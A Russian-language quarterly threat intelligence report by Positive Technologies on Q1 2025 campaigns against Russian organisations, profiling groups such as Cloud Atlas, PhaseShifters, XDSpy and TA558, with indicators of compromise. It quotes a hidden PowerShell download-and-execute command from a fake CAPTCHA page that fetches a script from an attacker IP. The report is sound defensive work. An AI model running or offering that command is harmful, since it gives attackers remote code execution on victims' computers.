Квартальный отчет март 2025

В первом квартале 2025 года российские организации столкнулись с рядом целевых кибератак, инициированных различными хакерскими группировками. В этом отчете рассматриваются наиболее значимые кибератаки за этот период, а также раскрываются методы, инструменты и инфраструктура, используемые злоумышленниками.

Исследование основано на данных из открытых источников, полученных с использованием внутренних систем департамента Threat Intelligence Positive Technologies. В нем приведены примеры атак для каждой выявленной группировки, включая описания цепочек атак, а также индикаторы компрометации (IoC), позволяющие идентифицировать потенциальную угрозу.

Цель отчета — предоставить практическую информацию о текущих угрозах. Материалы могут быть использованы специалистами по информационной безопасности для мониторинга сетевой активности, настройки средств защиты и расследования инцидентов, а также для разработки стратегий предотвращения атак.

Кроме того, отчет может быть полезен руководителям по информационной безопасности, поскольку он содержит актуальные сведения для разработки стратегий кибербезопасности, оценки рисков и совершенствования защитных мер. Данные могут быть применены в рамках планирования программ киберустойчивости, внедрения новых политик безопасности и повышения осведомленности сотрудников о существующих угрозах.

• PhantomCore — это хакерская группировка, впервые описанная российской компанией F.A.C.C.T. в марте 2024 года.
• Активность группы началась в январе 2024 года, что делает ее относительно новой угрозой в сфере кибершпионажа.
• Один из тестовых файлов их трояна PhantomRAT был впервые загружен на платформу VirusTotal 26 февраля 2024 года из Киева.

• Основным инструментом является троян удаленного доступа, названный PhantomRAT.
• Применяет .NET-приложения с опцией развертывания одним файлом (single file deployment).

Основными странами, на которые направлены атаки PhantomCore, являются Россия и Беларусь. Их операции имеют четкий географический фокус, вероятно, связанный с геополитическими факторами.

Учитывая природу кибершпионажа, можно предположить, что они могут включать стратегически важные отрасли, такие как:

• энергетика;
• финансовый сектор;
• промышленность;
• государственный сектор;
• транспортная отрасль;
• информационные технологии.

• Cloud Atlas — это группировка, занимающаяся кибершпионажем, впервые публично идентифицированная в 2013 году «Лабораторией Касперского» под названием Red October.
• В 2014 году группировка была замечена под своим текущим именем, Cloud Atlas, и с тех пор активно ведет свои операции. Известна и под другими именами, такими как Clean Ursa, Inception, Oxygen.
• Происхождение Cloud Atlas остается неизвестным. Однако использование русского сленга в их коде, как указано в отчетах, предполагает, что группировка может происходить из постсоветского пространства.

• Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями Microsoft Word и Excel для доставки своих вредоносных программ.
• Методы доставки и уклонения: группировка применяет RTF template injection, а также хостинг вредоносных файлов на легитимных облачных сервисах. Использует легитимные функции Microsoft Office, такие как шаблонные инъекции, для маскировки своих атак.
• Используемые инструменты: AnyDesk, Putty, LaZagne, PowerShower, VBShower и VBCloud.

• Основные страны: Россия, Беларусь, Азербайджан, Турция, Словения, Индия, Казахстан и Чехия.
• Анализ коллег из Check Point Software показывает, что группировка в основном фокусируется на России, особенно в свете недавнего увеличения активности, связанной со специальной военной операцией.

• государственные учреждения;
• военно-промышленный комплекс;
• сельскохозяйственная промышленность.

На протяжении 2025 года TI-департамент продолжает фиксировать атаки на государственные объекты, осуществляемые группировкой Cloud Atlas. Данная кампания была подробно описана в апрельском исследовании экспертного центра безопасности Positive Technologies.

Атаки начинаются с рассылки электронных писем, содержащих документы формата DOC со ссылками на удаленные вредоносные шаблоны (DOTM). При открытии документа загружается вредоносный шаблон, активирующий макросный код, который загружает и запускает бэкдор PowerShower.

Этот бэкдор позволяет злоумышленникам удаленно управлять зараженной системой, устанавливать дополнительные вредоносные модули и собирать данные.

Cloud Atlas использует технику внедрения шаблонов (Template Injection), что помогает ей обходить антивирусные решения, поскольку вредоносный код не содержится в самом документе, а загружается динамически.

• PseudoGamaredon, также известная как Core Werewolf, Awaken Likho и GamaCopy, — это группировка, занимающаяся кибершпионажем, впервые упомянутая в августе 2021 года, когда их вредоносные файлы были обнаружены на платформе VirusTotal.
• Первое публичное упоминание появилось в сентябре 2022 года в квартальном исследовательском отчете Positive Technologies.
• Основная цель PseudoGamaredon — кибершпионаж, направленный на сбор конфиденциальной информации.

• Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями, замаскированными под документы Microsoft Word и PDF, для доставки своих атак.
• Легитимное ПО: используют UltraVNC и MeshCentral для удаленного доступа к зараженным системам.
• Доставка через Telegram: с 2024 года группировка начала использовать Telegram для доставки вредоносных файлов.
• Имитация тактик: группировка имитирует методы других известных групп, таких как Gamaredon. Например, они используют схожие техники доставки и эксплойты, что затрудняет их идентификацию.

Основной страной, на которую направлены атаки PseudoGamaredon, является Россия.

• энергетика;
• телекоммуникации;
• промышленность;
• государственные учреждения;
• исследовательские компании;
• военно-промышленный комплекс.

• PhaseShifters, также известная как Sticky Werewolf и Angry Likho, — это хакерская группировка, занимающаяся кибершпионажем и атаками.
• Впервые публично упомянуты Positive Technologies в октябре 2024 года, хотя их активность отслеживается с весны 2023-го.

• Группировка использует фишинговые письма с вредоносными вложениями, такими как защищенные паролем архивы RAR, часто маскирующиеся под документы для проверки и подписи.
• Применяют стеганографию, скрывая вредоносное ПО в изображениях и текстовых файлах, что помогает обходить антивирусы.
• Среди используемых малварей — Rhadamanthys, DarkTrack RAT, Meta Stealer, AsyncRAT, Redline, Remcos, njRAT и XWorm. Они также используют крипторы по подписке (crypters as a service), связанные с группой Blind Eagle, и хранят закодированные полезные нагрузки в репозиториях BitBucket и GitHub.

Основными странами, на которые направлены атаки, являются Россия, Беларусь и Польша.

• энергетика;
• строительство;
• телекоммуникации;
• промышленность;
• транспорт;
• государственные учреждения;
• исследовательские компании.

В начале января 2025 года системами TI-департамента был обнаружен фишинговый документ якобы от компании из сферы военно-промышленного комплекса (занимается созданием БПЛА). Как и в предыдущих атаках, в документе присутствует обращение к SMB-ресурсу, что позволяет злоумышленникам получить NTLM-хеши пользователя через протокол SMB. Этот метод называется Forced Authentication. Его суть в том, что устройство через шаблон или внешние связи автоматически пытается установить соединение с сервером злоумышленников, что приводит к попытке аутентификации Windows на этом ресурсе. Примером такого подключения служит обращение вредоносного PDF-файла к SMB-ресурсу на сервере с IP-адресом 45.155.249[.]126.

Атаки группировки завершаются подключением жертвы к серверу злоумышленников и добычей NTLM-хешей пользователя, что позволяет злоумышленникам получить доступ к внутренним системам и ресурсам организации.

В ходе поиска других файлов, связанных с вышеуказанным IP-адресом, было выявлено еще несколько вредоносных документов для атак на организации и государственные объекты.

В феврале группа киберразведки также фиксировала фишинговые DOCX-документы, осуществляющие SMB-сканирование и взаимодействующие с IP-адресом 31.214.157[.]162. Атаки были нацелены на организации России и Беларуси. Эти документы также использовали метод Forced Authentication через SMB, а в метаданных документов присутствовала украинская раскладка.

Хакерская группировка Telemancon привлекла внимание специалистов по кибербезопасности из-за своей активности, направленной на российские промышленные организации. Исследования, проведенные компанией F6, указывают на то, что группировка, вероятно, имеет «прогосударственную» природу, что предполагает связь с иностранными спецслужбами.

• TMCDropper: дроппер с вариантами на C++ и C#, используемый для начального внедрения.
• TMCShell: бэкдор, обеспечивающий удаленный доступ и управление.
• Для связи с C2-сервером применяется платформа telegra.ph, где URL генерируется динамически на основе текущей даты, что затрудняет обнаружение.

Основной целью группировки является Россия.

• промышленность;
• государственные учреждения;
• военно-промышленный комплекс.

В начале февраля группой киберразведки Positive Technologies было замечено EML-письмо в адрес российской компании из машиностроительного сектора. Письмо содержало запароленный архив с вредоносным исполняемым SRC-файлом.

При запуске исполняемого файла запускается документ-приманка, представляющая из себя письмо с указаниями из ФСТЭК России.

Одновременно с этим исполняемый файл:

• Добавляет себя в автозагрузку через реестр.
• Создает и перемещает файлы в системных папках.
• Запускает PDF-файл для отвлечения внимания жертвы.
• Выполняет сетевые запросы (ping) к адресу 127.1.2.1.

После закрепления и отображения документа-приманки, вредоносное ПО извлекает из себя и сохраняет вредоносный PowerShell-скрипт, который потом инициирует взаимодействие с С2-сервером.

Проверка файла через PT Sandbox также показала его вредоносность.

• XDSpy — группировка, занимающаяся кибершпионажем, активная с 2011 года.
• Их впервые обнаружила белорусская компания CERT.BY в феврале 2020 года, а подробности раскрыла ESET в октябре 2020 года.
• Их цель — кража документов, особенно из военных и дипломатических учреждений.

• Используют целевой фишинг (spear phishing) с вредоносными файлами (RAR, ZIP, PowerPoint, LNK).
• Их инструменты включают XDDown, XDRecon, XDList, XDMonitor, XDUpload, XDLoc, XDPass и DSDownloader для сбора данных и мониторинга систем.

Основные цели — Беларусь, Россия, Сербия, Молдова, Украина.

• энергетика;
• финансовый сектор;
• промышленность;
• государственные учреждения;
• военно-промышленный комплекс;
• авиационно-космическая промышленность.

В середине марта группой киберразведки Positive Technologies была зафиксирована новая кампания хакерской группировки XDSpy, направленная на компрометацию государственных организаций и органов власти России.

Злоумышленники используют фишинговые письма, отправляемые с поддельных адресов, маскируясь под доверенные источники. В содержании сообщений применяются элементы социальной инженерии, побуждающие жертв перейти по вредоносной ссылке.

При переходе по ссылке жертва скачивает ZIP-архив.

Архив содержит LNK-файл, название которого совпадает с темой письма, а также файл, замаскированный под INI-документ, который на самом деле является архивом с легитимным исполняемым файлом (.exe), вредоносной DLL-библиотекой и конфигурационным файлом (.cfg), представляющим собой PDF-документ-приманку.

• DarkGaboon — хакерская группировка, впервые выявленная департаментом киберразведки экспертного центра безопасности Positive Technologies в октябре 2024 года.
• Вероятно, базируется в России или в стране со значительным русскоязычным населением. Предположение основано на нескольких языковых и культурных индикаторах:
  • Использование русского языка в фишинговых письмах, включая отсутствие ошибок в русском тексте.
  • Использование русской обсценной лексики в сертификатах X.509.

• Revenge RAT — троян удаленного доступа, используемый для компрометации систем.
• Фишинговые письма: группировка отправляет фишинговые письма с вредоносными вложениями, замаскированными под легитимные документы.
• Подпись malware: все образцы Revenge RAT подписаны фальшивыми сертификатами X.509, которые содержат русские термины, такие как «Акт сверки», 1С-Коннект, названия городов, брендов вроде Marvel и Coca Cola.

Основной страной, на которую направлены атаки DarkGaboon, является Россия.

• финансовый сектор;
• телекоммуникации;
• транспорт;
• неправительственные организации.

• TA558 — финансово мотивированная киберпреступная группировка, впервые публично идентифицированная компанией Proofpoint в апреле 2018 года, также известна как Odyssey Spider.
• Происхождение TA558 остается неизвестным.
• Группировка сосредоточена на финансовой выгоде, достигаемой через кражу данных, включая пользовательские данные и номера кредитных карт.

• Малвари: группировка применяет множество RAT, включая Loda RAT, Vjw0rm, Revenge RAT, Agent Tesla, Remcos RAT, LokiBot, GuLoader, Snake Keylogger и XWorm.
• Методы доставки: фишинговые письма с темами, связанными с бронированием номеров, заказами и резервированием, часто на португальском, испанском и английском языках.
• Новые техники: с 2024 года TA558 начала использовать стеганографию для скрытия вредоносного кода в изображениях.

• Латинская Америка: основной регион, где группировка преимущественно атакует носителей португальского и испанского языков.
• Западная Европа: регион также подвергается атакам, хотя в меньшей степени, с использованием аналогичных методов.
• Северная Америка: отмечены атаки на организации, особенно в секторе гостиничного бизнеса.
• Россия и Беларусь: в 2024 году группировка начала активно атаковать эти страны, нацеливаясь на предприятия в финансовом, логистическом, строительном и промышленном секторах, а также на государственные учреждения.

• энергетика;
• промышленность;
• транспорт;
• неправительственные организации.

В конце января группой киберразведки Positive Technologies было обнаружено фишинговое почтовое сообщение с мимикрией под болгарскую компанию. Для убедительности в теле письма также использовался болгарский язык.

Письмо содержит вложение, загружающее с удаленного командного сервера 152.228.229[.]214 и запускающее RTF-документ (см. рис. ниже), который использует уязвимость CVE-2017-11882 для загрузки и запуска HTA-файла со скрытым обфусцированным VBS-сценарием. При выполнении этого сценария на устройстве жертвы запускается программа Remcos RAT, позволяющая преступникам контролировать устройство жертвы.

• DarkWatchman, также известная как Hive0117, — финансово мотивированная киберпреступная группировка, впервые замеченная исследователями из Prevailion в ноябре 2021 года.
• Первые упоминания DarkWatchman RAT появились на русскоязычных подпольных форумах в 2021 году, что предполагает возможное происхождение операторов из стран постсоветского пространства. Это предположение основано на использовании русского языка в их кампаниях.

• DarkWatchman RAT — JavaScript-based RAT, который использует fileless-техники для хранения данных в реестре Windows.
• Методы доставки: группировка использует SEO poisoning для продвижения мошеннических веб-сайтов через поисковые системы, что отличает их от традиционного фишинга через электронные письма. Они также применяют целевой фишинг: электронные письма c ZIP-архивами, содержащими инвойсы, связанные с уведомлениями о сроке хранения грузов.

Основными странами, на которые направлены атаки DarkWatchman, являются Россия, Казахстан и Армения.

• финансовый сектор;
• государственные учреждения.

Rare Wolf — вероятно, финансово мотивированная киберпреступная группировка, впервые упомянутая в июле 2023 года, когда BI.ZONE Threat Intelligence опубликовала отчет о новой группе, использующей легитимное программное обеспечение для атак на гостиничную индустрию.

• Фишинговые письма: группировка отправляет фишинговые письма с поддельными накладными.
• Легитимное программное обеспечение: после получения первоначального доступа группировка устанавливает легитимные инструменты мониторинга, например Mipko Employee Monitor для мониторинга активности жертв и кражи чувствительных данных или AnyDesk для удаленного доступа.

Основной страной, на которую направлены атаки, является Россия.

• строительство;
• телекоммуникации;
• финансовый сектор;
• военно-промышленный комплекс;
• неправительственные организации.

С начала 2025 года команда киберразведки PT ESC фиксирует новые серверы управления, используемые группировкой, а также инструменты, задействованные в атаках.

Так, в конце января фиксировалась стадия подготовки группировкой новых атак: выявлен удаленный сервер с семплами вредоносной нагрузки, при изучении которых выявлены новые подходы к закреплению.

В ходе мониторинга угроз группа киберразведки Positive Technologies выявила утечку доступа к PhpMyAdmin сайта российской компании, специализирующейся на установке систем безопасности.

Анализ данных указывает на то, что за этой атакой могут стоять украинские хактивисты, действующие под именем hdr0, которые ранее уже осуществляли подобные действия, публикуя базы данных российских компаний в период с 2023 по 2024 год. Дополнительные сведения, полученные из кэша Google, свидетельствуют о том, что в прошлом файл settings.php, предположительно, мог загружаться с адреса, связанного с администрированием системы, что подтверждается обнаружением URL вида https://<redacted>/bitrix/admin/iblock_element_edit.php. При этом, учитывая предыдущий опыт анализа атак на системы, работающие на Bitrix, можно предположить, что файл конфигурации также мог быть доступен по другим адресам, таким как https://<redacted>/bitrix/admin/settings.php или https://ip-sol.ru/index.php.

На текущий момент наблюдается, что администраторские страницы, доступные по адресам https://<redacted>/bitrix/admin/ и https://<redacted>/.ru/pma, корректно отображают форму входа, что говорит о том, что меры по восстановлению и защите системы уже приняты. Однако тот факт, что файл error.log до сих пор доступен, может свидетельствовать о наличии ошибок в конфигурации прав доступа, что заслуживает дополнительного внимания специалистов.

Дополнительные упоминания этого инцидента в хакерских чатах отсутствуют, что может свидетельствовать о том, что кибератака не получила широкого резонанса в информационном пространстве.

Таким образом, совокупность полученных данных позволяет сделать вывод о том, что злоумышленники, вероятно, пытались использовать уязвимости в системе, однако своевременное обнаружение и устранение проблемы позволили ограничить последствия инцидента.

В начале марта группа киберразведки выявила серию фишинговых писем, предположительно нацеленных на HR-отделы российских компаний. Эти письма, маскирующиеся под официальные уведомления от hh.ru, популярной российской платформы для поиска работы, содержат угрозы блокировки аккаунта и побуждают получателей к немедленным действиям.

Особенность атаки заключается в использовании двух ссылок: первая ведет на легитимный сайт hh.ru для смены пароля, что создает иллюзию достоверности, а вторая, якобы для подтверждения, направляет пользователей на фишинговый ресурс www.hhsecurites.site. Этот сайт, размещенный на украинском IP-адресе (185.104.45.101), предназначен для кражи учетных данных.

Успешная атака может привести к утечке конфиденциальной информации сотрудников, которую обычно обрабатывают HR-специалисты, а также к дальнейшему использованию скомпрометированных аккаунтов для новых атак.

Примечательно, что описание на фишинговом домене содержит орфографические ошибки (например, «Зарегестрироваться»), а в верстке сайта присутствуют комментарии на украинском языке.

Внутренние системы группы киберразведки обнаружили взлом сайта для радиолюбителей. При входе на сайт пользователю сразу же предлагается пройти проверку и доказать, что он не робот.

При нажатии на кнопку «Я не робот» запускается JavaScript-функция. Она копирует заранее подготовленный текст в буфер обмена.

Пользователю предлагается следовать инструкциям: открыть окно «Выполнить» (Win+R) и нажать Ctrl+V, чтобы вставить скопированный текст. При этом в буфер попадает следующая команда:

PowerShell.exe -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1') # 'I am not a robot - reCAPTCHA ID: 477237535673 TRUE'"

Из-за ограниченного размера окна «Выполнить» отображается лишь последняя ее часть.

Группа киберразведки в феврале обнаружила фишинговое почтовое сообщение от неизвестного актора, адресованное одному из российских банков. Письмо содержало вложение в виде HTML-страницы с JavaScript-скриптом, который имитировал страницу входа в почтовый клиент. Для повышения правдоподобности в поле логина автоматически прописывался почтовый адрес жертвы, что могло ввести пользователя в заблуждение и побудить его ввести свои учетные данные.

В течение января и февраля группой киберразведки Positive Technologies фиксировались фишинговые документы якобы от имени ФСБ России в адрес коммерческих и государственных компаний. Целью мошенников было получение персональных данных сотрудников, которые могут быть использованы в дальнейших атаках на компании.

Фишинговый PDF-документ представляет собой запрос, подписанный начальником А. Н. Дорофеевым и адресованный государственному научно-исследовательскому предприятию.

Общая информация о документе:

Дата создания: 28.12.2024
MD5: 46771733f14e7a4a5f8182a4ed0cb592
Автор: react-pdf

Основные признаки поддельного документа:

• Использование несуществующего закона «ч. 4 ст.30.1 от 21 июля 1993 г. № 5885-1». Вероятно, злоумышленники хотели сослаться на закон «О государственной тайне» от 21 июля 1993 г. № 5485-1, но опечатались.

• Указание некорректных должностей.

• Использование поддельной подписи, а именно ее заимствование с домена td-elastik[.]ru.

Фишинговый PDF-документ представляет собой запрос, якобы подписанный первым заместителем директора ФСБ России С. Б. Королевым и адресованный российскому системному интегратору.

Общая информация о документе:

Дата создания: 04.02.2025
MD5: f11bbe86ead2d0fa1e7dba7cefdd934d
Автор: мвд

Основные признаки поддельного документа:

• Указание некорректной должности: «генерал» вместо «Генерал армии», а также выравнивание ФИО подписанта по левому краю, а не по правому.

• Использование поддельной подписи, а именно ее заимствование с домена bogatyr[.]club/54928-rospis-ruchkoj.html.

Сотрудники группы киберразведки регулярно фиксируют с помощью внутренних систем TI-департамента случаи отправки легитимных писем в публичные песочницы. Подобные инциденты указывают на недостаточную осведомлённость о рисках, связанных с раскрытием конфиденциальной информации, содержащейся в корпоративной переписке.

Отправка писем из внешнего контура в публичные песочницы, практикуемая рядом компаний, может привести к утечке чувствительных данных — учетных записей, паролей и ссылок на внутренние ресурсы. При попадании таких данных в руки злоумышленников возможен несанкционированный доступ к корпоративным системам. Для минимизации рисков, рекомендуется направлять в песочницу только подозрительные вложения, исключив метаданные и другие элементы, способные раскрыть внутреннюю инфраструктуру компании.